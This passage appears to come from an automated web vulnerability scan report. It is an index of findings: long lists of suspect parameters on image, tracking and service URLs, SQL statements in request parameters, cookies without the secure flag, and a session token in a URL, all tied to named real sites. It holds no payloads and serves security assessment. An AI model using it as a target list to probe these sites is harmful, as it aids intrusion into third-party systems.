9.231. http://api.ning.com/files/byVTbtCHsQMiC8zIPlJkCBa-ZNtUJMGDGKGd*KQOS-ctQ9moCAUT2pIyObMypIgkDIzZ1KUBmC7ocUN9qrO7vuyjC1A5ZhXF/Powerblock65.jpg [width parameter]

9.232. http://api.ning.com/files/cWCj44ZwGhFMaj7yxrnitjKFWl0akKuv-vEEfHGrxIYGkLUWdgOks4D4p2XQlyPrraM1CcYJ2GuU5P5EiyqL580y0tkEpRB8/loudpipes.jpg [crop parameter]

9.233. http://api.ning.com/files/cWCj44ZwGhFMaj7yxrnitjKFWl0akKuv-vEEfHGrxIYGkLUWdgOks4D4p2XQlyPrraM1CcYJ2GuU5P5EiyqL580y0tkEpRB8/loudpipes.jpg [width parameter]

9.234. http://api.ning.com/files/crT2*Oo83mWiiUHrsdsclRRyy53ARvUHoXp6BW4eq2LcCf9yRjVMlgHbuz8wfZH7qGTmMiPXFOpN7vRtJokq6Zuo0B6C4YN4/tmp200644.png [width parameter]

9.235. http://api.ning.com/files/eEwnvZxhwd-jAi4lIkvZQ-FfMOA3r*J7Q1uySna150vtip7xDgySlYkHNNPxkFy*t2Za-qMgx4i589m4s9Aj*oeRSDJzrlIL/1989fordf150.jpg [crop parameter]

9.236. http://api.ning.com/files/eEwnvZxhwd-jAi4lIkvZQ-FfMOA3r*J7Q1uySna150vtip7xDgySlYkHNNPxkFy*t2Za-qMgx4i589m4s9Aj*oeRSDJzrlIL/1989fordf150.jpg [width parameter]

9.237. http://api.ning.com/files/eLhsOgT7mGTlmsLnDsJyxYTltsSKYcPs94osnQ1bADNPXBGh4W1fhOGTGGL97Ba3aE1Bz0BBc3jTBZ-j9XTg4pTc2L4yzxoZ/DSC00099.JPG [crop parameter]

9.238. http://api.ning.com/files/eLhsOgT7mGTlmsLnDsJyxYTltsSKYcPs94osnQ1bADNPXBGh4W1fhOGTGGL97Ba3aE1Bz0BBc3jTBZ-j9XTg4pTc2L4yzxoZ/DSC00099.JPG [height parameter]

9.239. http://api.ning.com/files/eLhsOgT7mGTlmsLnDsJyxYTltsSKYcPs94osnQ1bADNPXBGh4W1fhOGTGGL97Ba3aE1Bz0BBc3jTBZ-j9XTg4pTc2L4yzxoZ/DSC00099.JPG [width parameter]

9.240. http://api.ning.com/files/en45jLVHD70slzBaA9UIVrNOsN3SW77ICJs2rp9LjD2SslXFAKXUmaZF2LJhWQtNExMxRNcQg3NJb1Kwh9Dg03yMja4qG4YD/IMAG0015.JPG [crop parameter]

9.241. http://api.ning.com/files/en45jLVHD70slzBaA9UIVrNOsN3SW77ICJs2rp9LjD2SslXFAKXUmaZF2LJhWQtNExMxRNcQg3NJb1Kwh9Dg03yMja4qG4YD/IMAG0015.JPG [height parameter]

9.242. http://api.ning.com/files/en45jLVHD70slzBaA9UIVrNOsN3SW77ICJs2rp9LjD2SslXFAKXUmaZF2LJhWQtNExMxRNcQg3NJb1Kwh9Dg03yMja4qG4YD/IMAG0015.JPG [width parameter]

9.243. http://api.ning.com/files/fqSC8vTFc7NJThef1db8bQwK8odFihgr59T6v2MgcsRkvuzpbz-UZI8viloj4wbz31ZwIYCxtpo91rpnCxg2Ix6WK17kQjkb/724151049.jpeg [width parameter]

9.244. http://api.ning.com/files/h7nodgo-CPAdjCIpRJ9msgxFXYZzb7scWf*Q1TiF6O*NIN2*sI0YhYdXnQRARvAJqC7lkU7xe0wr1GqeUw3GKTdQ4rGEGzNb/MostlyDSO005.JPG [crop parameter]

9.245. http://api.ning.com/files/h7nodgo-CPAdjCIpRJ9msgxFXYZzb7scWf*Q1TiF6O*NIN2*sI0YhYdXnQRARvAJqC7lkU7xe0wr1GqeUw3GKTdQ4rGEGzNb/MostlyDSO005.JPG [height parameter]

9.246. http://api.ning.com/files/h7nodgo-CPAdjCIpRJ9msgxFXYZzb7scWf*Q1TiF6O*NIN2*sI0YhYdXnQRARvAJqC7lkU7xe0wr1GqeUw3GKTdQ4rGEGzNb/MostlyDSO005.JPG [width parameter]

9.247. http://api.ning.com/files/hnlQFaB2Vwn14-u1TSER8E*KIbv88iFmcH58GBnilmbYAfTuI62aQJumXiBsWnksE8s2TZI1YGDiuB7oEhdl8g7MPORZz*4g/591657638.jpeg [width parameter]

9.248. http://api.ning.com/files/iYxR2yB*BHaFzM4fDUlXjdJG5Llt-BpkA1g*tITDy*ljx1WhvUw*2JFqHp546Fh5NEgk0-HTNTq7Puin6lodfHJ0*-y7H3wZ/691770702.jpeg [width parameter]

9.249. http://api.ning.com/files/jLL-JdCZ2vgKHnmzutemnAYz4x5xpOhiY29DQY0Ca*goVmVNdOb3h-hOaLWi4RulZRwVKk2D7kFL0vKVlMY-vihOgAk7tHpFI7lZNbZheI8_/0715101400b.jpg [crop parameter]

9.250. http://api.ning.com/files/jLL-JdCZ2vgKHnmzutemnAYz4x5xpOhiY29DQY0Ca*goVmVNdOb3h-hOaLWi4RulZRwVKk2D7kFL0vKVlMY-vihOgAk7tHpFI7lZNbZheI8_/0715101400b.jpg [height parameter]

9.251. http://api.ning.com/files/jLL-JdCZ2vgKHnmzutemnAYz4x5xpOhiY29DQY0Ca*goVmVNdOb3h-hOaLWi4RulZRwVKk2D7kFL0vKVlMY-vihOgAk7tHpFI7lZNbZheI8_/0715101400b.jpg [width parameter]

9.252. http://api.ning.com/files/luUYpbe-iHUtLe40mgQJtBYM4HzGnunPRcsAqt8oKJneaxmyU67gjtm2LbrecDxE0IHd20kgMC4nwEvY9guUhvEFfijjucPQ/676100341.jpeg [width parameter]

9.253. http://api.ning.com/files/lzyxdIAOXoIWaE6J7MCOj4N7HqNH9aTPxvcKtAmylrsPOjjJNo0e*Fc4uzfBdKcHAwNDwLwzEYbHhmbvxH9Lfumdz*GzFzNe/008.JPG [crop parameter]

9.254. http://api.ning.com/files/lzyxdIAOXoIWaE6J7MCOj4N7HqNH9aTPxvcKtAmylrsPOjjJNo0e*Fc4uzfBdKcHAwNDwLwzEYbHhmbvxH9Lfumdz*GzFzNe/008.JPG [height parameter]

9.255. http://api.ning.com/files/lzyxdIAOXoIWaE6J7MCOj4N7HqNH9aTPxvcKtAmylrsPOjjJNo0e*Fc4uzfBdKcHAwNDwLwzEYbHhmbvxH9Lfumdz*GzFzNe/008.JPG [width parameter]

9.256. http://api.ning.com/files/mlXhfF*fKNV7AMcRBXnXoyhNJ0uhR1dQgpYYF6oylrwueLM-cLgwJPOr9D*WJ-jQpOVkgSqllK98s85hMA-*iyNwngKtBK4u/tmp221052.png [width parameter]

9.257. http://api.ning.com/files/mnLTHONz2CE60oPCHBfDsE95CKmZ*W3-vDX2j6AUFPL6CAkXSavIQu-i2*FuAYpI6dEYDgkPdUQ677N1UcVOzaPyvPGIPbvk/SummerDart.jpg [crop parameter]

9.258. http://api.ning.com/files/mnLTHONz2CE60oPCHBfDsE95CKmZ*W3-vDX2j6AUFPL6CAkXSavIQu-i2*FuAYpI6dEYDgkPdUQ677N1UcVOzaPyvPGIPbvk/SummerDart.jpg [height parameter]

9.259. http://api.ning.com/files/mnLTHONz2CE60oPCHBfDsE95CKmZ*W3-vDX2j6AUFPL6CAkXSavIQu-i2*FuAYpI6dEYDgkPdUQ677N1UcVOzaPyvPGIPbvk/SummerDart.jpg [width parameter]

9.260. http://api.ning.com/files/mo4XbGrSFos4IiNbwHqX8hfKJaC0yAco6KmahFpeGFyLAcJDhP4mNELg78rqIRTFfQtv474RsKxI8QGyiPVOjofprrytdXDY/SSPX0098.JPG [crop parameter]

9.261. http://api.ning.com/files/mo4XbGrSFos4IiNbwHqX8hfKJaC0yAco6KmahFpeGFyLAcJDhP4mNELg78rqIRTFfQtv474RsKxI8QGyiPVOjofprrytdXDY/SSPX0098.JPG [width parameter]

9.262. http://api.ning.com/files/myq9jYJW-YPf*xZ0JNZMczBffvSnaSVImYAloqNiDfatpS-Ya7ZRfhBw6IZ*W8lyONrRQSKeCtnt6XR3HyL3rxnk65bmTEdV/IMAG0006.jpg [width parameter]

9.263. http://api.ning.com/files/n0SsQeBwplRj0Y9Gtp9NXCmRHx0kW7WW67sKd9CvtrwX-nebiPR7PFXembmnXOmf-oTt1TxBbdRqwOBnJprNwsHyFAJamFMs/100_0341.JPG [crop parameter]

9.264. http://api.ning.com/files/n0SsQeBwplRj0Y9Gtp9NXCmRHx0kW7WW67sKd9CvtrwX-nebiPR7PFXembmnXOmf-oTt1TxBbdRqwOBnJprNwsHyFAJamFMs/100_0341.JPG [height parameter]

9.265. http://api.ning.com/files/n0SsQeBwplRj0Y9Gtp9NXCmRHx0kW7WW67sKd9CvtrwX-nebiPR7PFXembmnXOmf-oTt1TxBbdRqwOBnJprNwsHyFAJamFMs/100_0341.JPG [width parameter]

9.266. http://api.ning.com/files/netWIHey1xSCyciI4c*v9H5ccsWCnSA8ScqixEsUh8rQSzvTHPhGyP9sfFlThaTJ803FnRRx-IDpQlcVPuYeDvsROGePCya7/tmp240738.png [width parameter]

9.267. http://api.ning.com/files/netWIHey1xTppOEfo6SOF9NVoXxJ2czE4vRDIlbq56z4yI82vANia*8DT-U9hYa3wfVBejvafs1WtDnMJ4QBNJ2Oc7yE*SXO/MyWifesviewofInsanity.JPG [crop parameter]

9.268. http://api.ning.com/files/netWIHey1xTppOEfo6SOF9NVoXxJ2czE4vRDIlbq56z4yI82vANia*8DT-U9hYa3wfVBejvafs1WtDnMJ4QBNJ2Oc7yE*SXO/MyWifesviewofInsanity.JPG [height parameter]

9.269. http://api.ning.com/files/netWIHey1xTppOEfo6SOF9NVoXxJ2czE4vRDIlbq56z4yI82vANia*8DT-U9hYa3wfVBejvafs1WtDnMJ4QBNJ2Oc7yE*SXO/MyWifesviewofInsanity.JPG [width parameter]

9.270. http://api.ning.com/files/o7ceSnauV4SXeqyTxXA4rxegFnSf-k7R1bgCm9OPZ1zEoq3xKHhw6XwNhtnI8kyeG*1U-qZEjAa*IMD7NE*KAfC*MKUpexRZ/006.jpg [crop parameter]

9.271. http://api.ning.com/files/o7ceSnauV4SXeqyTxXA4rxegFnSf-k7R1bgCm9OPZ1zEoq3xKHhw6XwNhtnI8kyeG*1U-qZEjAa*IMD7NE*KAfC*MKUpexRZ/006.jpg [height parameter]

9.272. http://api.ning.com/files/o7ceSnauV4SXeqyTxXA4rxegFnSf-k7R1bgCm9OPZ1zEoq3xKHhw6XwNhtnI8kyeG*1U-qZEjAa*IMD7NE*KAfC*MKUpexRZ/006.jpg [width parameter]

9.273. http://api.ning.com/files/oE8l13qy8WUVizpLBFFaYuxObOPicFtg6*gEMwDDJ5Ry7STFz8qcXXX5iwhWaK7ut2rl*RBWOzK8-fhOuBFCDROdKaLNWtFy/tmp30862.png [width parameter]

9.274. http://api.ning.com/files/pGe2TSzC1Gdd7B0a0D-z5GqGW4e0jXo4Nf6f8n1liQe4a2b7XSLcTbS7OUeOLiDcrdoJiI4iAl2Z0H2-G9NEK44KEvVBZi0i/readersRides_group_v2.jpg [crop parameter]

9.275. http://api.ning.com/files/pGe2TSzC1Gdd7B0a0D-z5GqGW4e0jXo4Nf6f8n1liQe4a2b7XSLcTbS7OUeOLiDcrdoJiI4iAl2Z0H2-G9NEK44KEvVBZi0i/readersRides_group_v2.jpg [width parameter]

9.276. http://api.ning.com/files/pQHHyY-Jf*XcJ9hdNDMTeYzqZGQGeY0ModSVhZG4PBvt9Yms4XS0VxTUg1dEH9xCPoQTMeOMhnVTxhr-vsS2LuvpqFH*VB5B/016.jpg [crop parameter]

9.277. http://api.ning.com/files/pQHHyY-Jf*XcJ9hdNDMTeYzqZGQGeY0ModSVhZG4PBvt9Yms4XS0VxTUg1dEH9xCPoQTMeOMhnVTxhr-vsS2LuvpqFH*VB5B/016.jpg [height parameter]

9.278. http://api.ning.com/files/pQHHyY-Jf*XcJ9hdNDMTeYzqZGQGeY0ModSVhZG4PBvt9Yms4XS0VxTUg1dEH9xCPoQTMeOMhnVTxhr-vsS2LuvpqFH*VB5B/016.jpg [width parameter]

9.279. http://api.ning.com/files/pReGK9r64Gvswx3XLOjtefD2RROq7mxknrDGNgeMtjXqfHlEzfEtSwKFjNWy6nhjDtxf0qH6pJ*bm*j1BbUkTbreZWuDH*do/bigred.jpg [crop parameter]

9.280. http://api.ning.com/files/pReGK9r64Gvswx3XLOjtefD2RROq7mxknrDGNgeMtjXqfHlEzfEtSwKFjNWy6nhjDtxf0qH6pJ*bm*j1BbUkTbreZWuDH*do/bigred.jpg [width parameter]

9.281. http://api.ning.com/files/qHdU-tkhqvBXzFWe-Vaelie7r8qOGum6pLCYFjyZ472YrI0D*k1YeNuL0p7T*4BmID*E1HlMANOwb8-UwTQgKwy26gA40uQT/282007214554.jpg [crop parameter]

9.282. http://api.ning.com/files/qHdU-tkhqvBXzFWe-Vaelie7r8qOGum6pLCYFjyZ472YrI0D*k1YeNuL0p7T*4BmID*E1HlMANOwb8-UwTQgKwy26gA40uQT/282007214554.jpg [height parameter]

9.283. http://api.ning.com/files/qHdU-tkhqvBXzFWe-Vaelie7r8qOGum6pLCYFjyZ472YrI0D*k1YeNuL0p7T*4BmID*E1HlMANOwb8-UwTQgKwy26gA40uQT/282007214554.jpg [width parameter]

9.284. http://api.ning.com/files/qy5tPNfQYtmiqYj67BMxPrYTwhTMtUBkgKWgrBDphC5InZ5mA*iuiEtNKwO9n1YtD8k3tFUviZsXSsV03IS1CXjDJ6HW7Rns/DSC_1288.JPG [height parameter]

9.285. http://api.ning.com/files/qy5tPNfQYtmiqYj67BMxPrYTwhTMtUBkgKWgrBDphC5InZ5mA*iuiEtNKwO9n1YtD8k3tFUviZsXSsV03IS1CXjDJ6HW7Rns/DSC_1288.JPG [width parameter]

9.286. http://api.ning.com/files/qy5tPNfQYtmjH3H0tDGJXiWwpIUeUtAJiFtdq04l6Yf0dL0-bDSbjagT0j7v9D-OEroyTWk2k*RY6aq2fh3e-bpPqnQdFU6s/DSC_1300.JPG [height parameter]

9.287. http://api.ning.com/files/qy5tPNfQYtmjH3H0tDGJXiWwpIUeUtAJiFtdq04l6Yf0dL0-bDSbjagT0j7v9D-OEroyTWk2k*RY6aq2fh3e-bpPqnQdFU6s/DSC_1300.JPG [width parameter]

9.288. http://api.ning.com/files/rljJO8AEkSZk1L36V5ezWXeg1G-5cOjI2-2f6POKs80tTIlw9kToSM9hWmoDdUOYyZMe-rreoAXAxwGRhx48bhnjDfDbCKEV/tmp113676.png [width parameter]

9.289. http://api.ning.com/files/rvaOGCiBMsseC8fFPLoo8Or3s4gKb6H1*Zv8JZhWiMaaheeZ0cv0kw1tGEsyw5h-yjugvrc-pcRBdJQ8rFd717bzTht8Ers5/tmp235589.png [width parameter]

9.290. http://api.ning.com/files/s-81z-r13VSqJG5qqW2FopgjTvKvyjngjKm9gfF2vxMcGPRgZ-bgrlO9n71cdnVuLnO4guWcy1k-aJqGzupGFnnXf*XbsYwC/tmp150305.png [width parameter]

9.291. http://api.ning.com/files/s5H3EcRxxIk0BeoM9AfRMsbwqy7lUm4GuXbOxg7zsbYr4JJa4G4Ajh4HBlvZy91jA-T3dp6Gtcep*uSDWcTnaQNbLz4VXVHv/67mustang002.JPG [crop parameter]

9.292. http://api.ning.com/files/s5H3EcRxxIk0BeoM9AfRMsbwqy7lUm4GuXbOxg7zsbYr4JJa4G4Ajh4HBlvZy91jA-T3dp6Gtcep*uSDWcTnaQNbLz4VXVHv/67mustang002.JPG [width parameter]

9.293. http://api.ning.com/files/sWlRIz*HSRXGHfkf4Z3edfholnrIa4GRWaNOPK9Y4gdBrfgUF4gTKL5XO3P804zcFVbqGaiJDsqZsrGpdy6-JiK0AzbCOoIm/ford_trucks.png [crop parameter]

9.294. http://api.ning.com/files/sWlRIz*HSRXGHfkf4Z3edfholnrIa4GRWaNOPK9Y4gdBrfgUF4gTKL5XO3P804zcFVbqGaiJDsqZsrGpdy6-JiK0AzbCOoIm/ford_trucks.png [width parameter]

9.295. http://api.ning.com/files/t40*GTp9KtAg0SFiBjnlDcZ7DTnd6xPO1kutpNhs*DF1P6B*BXXK7QoG3TMnWDUke2y*y-LSwjGij9IhwWcE5ucmKRNl6sRX/camaro3003.jpg [crop parameter]

9.296. http://api.ning.com/files/t40*GTp9KtAg0SFiBjnlDcZ7DTnd6xPO1kutpNhs*DF1P6B*BXXK7QoG3TMnWDUke2y*y-LSwjGij9IhwWcE5ucmKRNl6sRX/camaro3003.jpg [height parameter]

9.297. http://api.ning.com/files/t40*GTp9KtAg0SFiBjnlDcZ7DTnd6xPO1kutpNhs*DF1P6B*BXXK7QoG3TMnWDUke2y*y-LSwjGij9IhwWcE5ucmKRNl6sRX/camaro3003.jpg [width parameter]

9.298. http://api.ning.com/files/t5EzMpZZPFAin4IO7Aapkl9JpQ7kSyTrRF3-Q2ZtCeYA8gHIn4UkyOBs9QITKkwYnVn6r95t7sJJiMffanknztV4qK40F3p6/84mustang.JPG [crop parameter]

9.299. http://api.ning.com/files/t5EzMpZZPFAin4IO7Aapkl9JpQ7kSyTrRF3-Q2ZtCeYA8gHIn4UkyOBs9QITKkwYnVn6r95t7sJJiMffanknztV4qK40F3p6/84mustang.JPG [height parameter]

9.300. http://api.ning.com/files/t5EzMpZZPFAin4IO7Aapkl9JpQ7kSyTrRF3-Q2ZtCeYA8gHIn4UkyOBs9QITKkwYnVn6r95t7sJJiMffanknztV4qK40F3p6/84mustang.JPG [width parameter]

9.301. http://api.ning.com/files/tfNsxIq*YkQAb*usZiJXVYnjlXBqRq*RIYQvYU6cpzSXkmMRs1VJmgWZGmM3Zg553AKgZKX*qKkKcmD7aIaCCxXGeS0r-vIy/HPIM0540.JPG [height parameter]

9.302. http://api.ning.com/files/tfNsxIq*YkQAb*usZiJXVYnjlXBqRq*RIYQvYU6cpzSXkmMRs1VJmgWZGmM3Zg553AKgZKX*qKkKcmD7aIaCCxXGeS0r-vIy/HPIM0540.JPG [width parameter]

9.303. http://api.ning.com/files/tfNsxIq*YkQmfjFHpk9smgNs6d0-7pfPaZZA0l-vD4BQCdqr67ee6J29OZ8-LK7Hs2Cy8uVBGUKf50PlmHMy90V5pmSRkU-1/DSC_01160001.JPG [height parameter]

9.304. http://api.ning.com/files/tfNsxIq*YkQmfjFHpk9smgNs6d0-7pfPaZZA0l-vD4BQCdqr67ee6J29OZ8-LK7Hs2Cy8uVBGUKf50PlmHMy90V5pmSRkU-1/DSC_01160001.JPG [width parameter]

9.305. http://api.ning.com/files/twSwwvB0PBBbfvTT9XIB*nqElsOVm06GEkxnOjYO*doTByHY0SjITK5HG111KXDvQw92rNso*TOih8uOb3ZV33Rlmv*AeGqBf8Vxi6qtorM_/5.0Lv8.jpg [crop parameter]

9.306. http://api.ning.com/files/twSwwvB0PBBbfvTT9XIB*nqElsOVm06GEkxnOjYO*doTByHY0SjITK5HG111KXDvQw92rNso*TOih8uOb3ZV33Rlmv*AeGqBf8Vxi6qtorM_/5.0Lv8.jpg [height parameter]

9.307. http://api.ning.com/files/twSwwvB0PBBbfvTT9XIB*nqElsOVm06GEkxnOjYO*doTByHY0SjITK5HG111KXDvQw92rNso*TOih8uOb3ZV33Rlmv*AeGqBf8Vxi6qtorM_/5.0Lv8.jpg [width parameter]

9.308. http://api.ning.com/files/v6RhDskxHQwAYptw-cgq-itrjui3kP2cRQZJMaDpRJ22s8HbwJZHhllx7cPdlkDfZGlkwH4zeBa4MmAwgB-xhrCitCkqb4r5/dewaynescar.jpg [crop parameter]

9.309. http://api.ning.com/files/v6RhDskxHQwAYptw-cgq-itrjui3kP2cRQZJMaDpRJ22s8HbwJZHhllx7cPdlkDfZGlkwH4zeBa4MmAwgB-xhrCitCkqb4r5/dewaynescar.jpg [height parameter]

9.310. http://api.ning.com/files/v6RhDskxHQwAYptw-cgq-itrjui3kP2cRQZJMaDpRJ22s8HbwJZHhllx7cPdlkDfZGlkwH4zeBa4MmAwgB-xhrCitCkqb4r5/dewaynescar.jpg [width parameter]

9.311. http://api.ning.com/files/vvuJEKXdfjUeFABKZX4M-Xe3bVGQ3L5g5fH8vS3fVl9f7FO*Ouqq813REof2Af2r*jFAFvPQrRO17KS*qzyf0KDLwWmfi-ID/evoalogo.jpg [crop parameter]

9.312. http://api.ning.com/files/vvuJEKXdfjUeFABKZX4M-Xe3bVGQ3L5g5fH8vS3fVl9f7FO*Ouqq813REof2Af2r*jFAFvPQrRO17KS*qzyf0KDLwWmfi-ID/evoalogo.jpg [width parameter]

9.313. http://api.ning.com/files/vvuJEKXdfjWcrK3rHaxH3OEl9vl7MhN5qAZNbmhcaPNoAboKIg0wQAlvY7U0wB0i2YLnV2cMWaGqfB6zVhy77oXNhb3yw9LV/Z28004.jpg [crop parameter]

9.314. http://api.ning.com/files/vvuJEKXdfjWcrK3rHaxH3OEl9vl7MhN5qAZNbmhcaPNoAboKIg0wQAlvY7U0wB0i2YLnV2cMWaGqfB6zVhy77oXNhb3yw9LV/Z28004.jpg [height parameter]

9.315. http://api.ning.com/files/vvuJEKXdfjWcrK3rHaxH3OEl9vl7MhN5qAZNbmhcaPNoAboKIg0wQAlvY7U0wB0i2YLnV2cMWaGqfB6zVhy77oXNhb3yw9LV/Z28004.jpg [width parameter]

9.316. http://api.ning.com/files/wPenpGf-4YFh6nC3sgUfxm5P*kA7hHfYsf6bEbUqhT6ANqZTSg21diA0AXVAiky6gPnWqa51QmK115Z4IORjJRZ6rxEvhIyp/TrojanHorse78x68.jpg [crop parameter]

9.317. http://api.ning.com/files/wZGjaXWY1YFBQuRubYTHxeDrvs5MUvnFRAe4NigShuQyOjruN-5cFZejpZPcPKkVU9FdaF**JgLwDT2ZDVe1Z0b7tFXtkxyZ/040311022.JPG [crop parameter]

9.318. http://api.ning.com/files/wZGjaXWY1YFBQuRubYTHxeDrvs5MUvnFRAe4NigShuQyOjruN-5cFZejpZPcPKkVU9FdaF**JgLwDT2ZDVe1Z0b7tFXtkxyZ/040311022.JPG [height parameter]

9.319. http://api.ning.com/files/wZGjaXWY1YFBQuRubYTHxeDrvs5MUvnFRAe4NigShuQyOjruN-5cFZejpZPcPKkVU9FdaF**JgLwDT2ZDVe1Z0b7tFXtkxyZ/040311022.JPG [width parameter]

9.320. http://api.ning.com/files/xWc55oavAb916tF6M1dyuI0hUdqHCbKTNRquWZ0OPacyRsadqXEfbxD7amwoPKvkZ3*C*yz9lMFgLuAmax6ADig9H*kgiLYj/PissonFord.gif [crop parameter]

9.321. http://api.ning.com/files/xWc55oavAb916tF6M1dyuI0hUdqHCbKTNRquWZ0OPacyRsadqXEfbxD7amwoPKvkZ3*C*yz9lMFgLuAmax6ADig9H*kgiLYj/PissonFord.gif [width parameter]

9.322. http://api.ning.com/files/yCqU7*-KSkTXOkFV2gnHR41CMLkWomiAOyDL60cINieVz-ojHwV1Dq6OYCMLYP0zMf5BR*fVWctIy3MjaR44lzbhGdZo8IX6/mercury_sled.png [crop parameter]

9.323. http://api.ning.com/files/yCqU7*-KSkTXOkFV2gnHR41CMLkWomiAOyDL60cINieVz-ojHwV1Dq6OYCMLYP0zMf5BR*fVWctIy3MjaR44lzbhGdZo8IX6/mercury_sled.png [width parameter]

9.324. http://api.ning.com/files/yQ8NI5nawEcowvnSvt*HSJsEZaJc8unJiw4-ReEl7HxHJA*BHHDUDK5fogpChtNBlPdj-CW*cPisyr7mJ5-Sj*Knd3ZQ4m1Z/524390118.jpeg [width parameter]

9.325. http://api.ning.com/files/yQ8NI5nawEdNtVbVc2JYvTPX-9vKNKMVUGlAz6ZO5zIX9C*UV6wi8whNPeb2L0Qd3JCpkdst*UhksvUb6R7jt4he8bHcYz54/524390158.jpeg [width parameter]

9.326. http://api.ning.com/icons/appatar/2170052 [height parameter]

9.327. http://api.ning.com/icons/appatar/2170052 [width parameter]

9.328. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [focusOnInit parameter]

9.329. http://r.unicornmedia.com/content.aspx [at parameter]

9.330. http://r.unicornmedia.com/content.aspx [uid parameter]

9.331. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [browserurl XML parameter]

9.332. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [domain XML attribute]

9.333. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [encoding XML attribute]

9.334. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [flashversion XML parameter]

9.335. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [identity XML parameter]

9.336. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [language XML parameter]

9.337. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [os XML parameter]

9.338. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [playerurl XML parameter]

9.339. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [referrerurl XML parameter]

9.340. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [runtime XML parameter]

9.341. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [screenx XML parameter]

9.342. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [screeny XML parameter]

9.343. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [trackerid XML parameter]

9.344. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [transportSequenceID XML attribute]

9.345. http://rcv-srv86.inplay.tubemogul.com/StreamReceiver/services [version XML attribute]

9.346. http://receive.inplay.tubemogul.com/StreamReceiver/services [browserurl XML parameter]

9.347. http://receive.inplay.tubemogul.com/StreamReceiver/services [domain XML attribute]

9.348. http://receive.inplay.tubemogul.com/StreamReceiver/services [encoding XML attribute]

9.349. http://receive.inplay.tubemogul.com/StreamReceiver/services [flashversion XML parameter]

9.350. http://receive.inplay.tubemogul.com/StreamReceiver/services [identity XML parameter]

9.351. http://receive.inplay.tubemogul.com/StreamReceiver/services [language XML parameter]

9.352. http://receive.inplay.tubemogul.com/StreamReceiver/services [os XML parameter]

9.353. http://receive.inplay.tubemogul.com/StreamReceiver/services [playerurl XML parameter]

9.354. http://receive.inplay.tubemogul.com/StreamReceiver/services [referrerurl XML parameter]

9.355. http://receive.inplay.tubemogul.com/StreamReceiver/services [runtime XML parameter]

9.356. http://receive.inplay.tubemogul.com/StreamReceiver/services [screenx XML parameter]

9.357. http://receive.inplay.tubemogul.com/StreamReceiver/services [screeny XML parameter]

9.358. http://receive.inplay.tubemogul.com/StreamReceiver/services [trackerid XML parameter]

9.359. http://receive.inplay.tubemogul.com/StreamReceiver/services [transportSequenceID XML attribute]

9.360. http://receive.inplay.tubemogul.com/StreamReceiver/services [version XML attribute]

9.361. http://static.inplay.tubemogul.com/core/core-as3-v4.4.0.swf [REST URL parameter 1]

9.362. http://static.inplay.tubemogul.com/core/core-as3-v4.4.0.swf [REST URL parameter 2]

9.363. http://www.rockyou.com/slideshow/readxml.php [REST URL parameter 1]

9.364. http://www.rockyou.com/slideshow/readxml.php [REST URL parameter 2]

10. Password returned in later response

11. SQL statement in request parameter

11.1. http://help.smartertools.com/SmarterMail/v8/Default.aspx

11.2. http://visitordrive.com/evTracker/services/keywords.php

11.3. https://www.webmaillive.co.uk/App_Themes/Default/CSS/StyleSheet.ashx

11.4. https://www.webmaillive.co.uk/App_Themes/Default/Javascript/JavaScript.ashx

11.5. https://www.webmaillive.co.uk/ScriptResource.axd

12. SSL cookie without secure flag set

12.1. https://www.evri.com/accounts/sign_in

12.2. https://www.evri.com/accounts/sign_up

12.3. https://www.ngi.it/F3/

12.4. https://www.ngi.it/F4/

12.5. https://www.ngi.it/F5/

12.6. https://www.ngi.it/F6/

12.7. https://www.ngi.it/arAgenti/

12.8. https://www.ngi.it/arClienti/ngiLoginLost.asp

12.9. https://www.ngi.it/arDealer/

12.10. https://www.ngi.it/corporate/

12.11. https://www.ngi.it/corporate/adv.asp

12.12. https://www.ngi.it/corporate/assettosocietario.asp

12.13. https://www.ngi.it/corporate/cartaservizi.asp

12.14. https://www.ngi.it/corporate/mission.asp

12.15. https://www.ngi.it/corporate/stampa.asp

12.16. https://www.ngi.it/gwHW/accessoriadsl.asp

12.17. https://www.ngi.it/gwHW/adsl4mega.asp

12.18. https://www.ngi.it/gwHW/adsl_voip.asp

12.19. https://www.ngi.it/gwHW/anagrafica.asp

12.20. https://www.ngi.it/gwHW/anagrafica.asp

12.21. https://www.ngi.it/gwHW/condizioni.asp

12.22. https://www.ngi.it/gwHW/contatti.asp

12.23. https://www.ngi.it/gwHW/eolo.asp

12.24. https://www.ngi.it/gwHW/faq.asp

12.25. https://www.ngi.it/gwHW/garanzie.asp

12.26. https://www.ngi.it/gwHW/metodipagamento.asp

12.27. https://www.ngi.it/gwHW/portadaptervoip.asp

12.28. https://www.ngi.it/gwHW/resi.asp

12.29. https://www.ngi.it/gwHW/router_hdsl.asp

12.30. https://www.ngi.it/gwHW/router_s_hdsl.asp

12.31. https://www.ngi.it/gwHW/telefonivoip.asp

12.32. https://www.ngi.it/gwHW/wiredadsl.asp

12.33. https://www.ngi.it/gwHW/wirelessadsl.asp

12.34. https://www.ngi.it/gwHw/

12.35. https://www.ngi.it/gwHw/

12.36. https://www.ngi.it/gwHw/adsl.asp

12.37. https://www.ngi.it/gwHw/error.asp

12.38. https://www.ngi.it/gwHw/error.asp

12.39. https://www.ngi.it/gwHw/hdsl.asp

12.40. https://www.ngi.it/gwHw/isdn.asp

12.41. https://www.ngi.it/gwHw/voip.asp

12.42. https://www.ngi.it/squillo/

12.43. https://www.webmaillive.co.uk/

12.44. https://www.webmaillive.co.uk/Login.aspx

12.45. https://www.rockyou.com/login/

12.46. https://www.rockyou.com/login/index.php

12.47. https://www.rockyou.com/resetpassword.php

12.48. https://www.webmaillive.co.uk/Login.aspx

12.49. https://www.websitepanel.co.uk/Default.aspx

13. Session token in URL

13.1. http://3515178b5d.mypowerblock.ninggadgets.com/gadgets/ifr

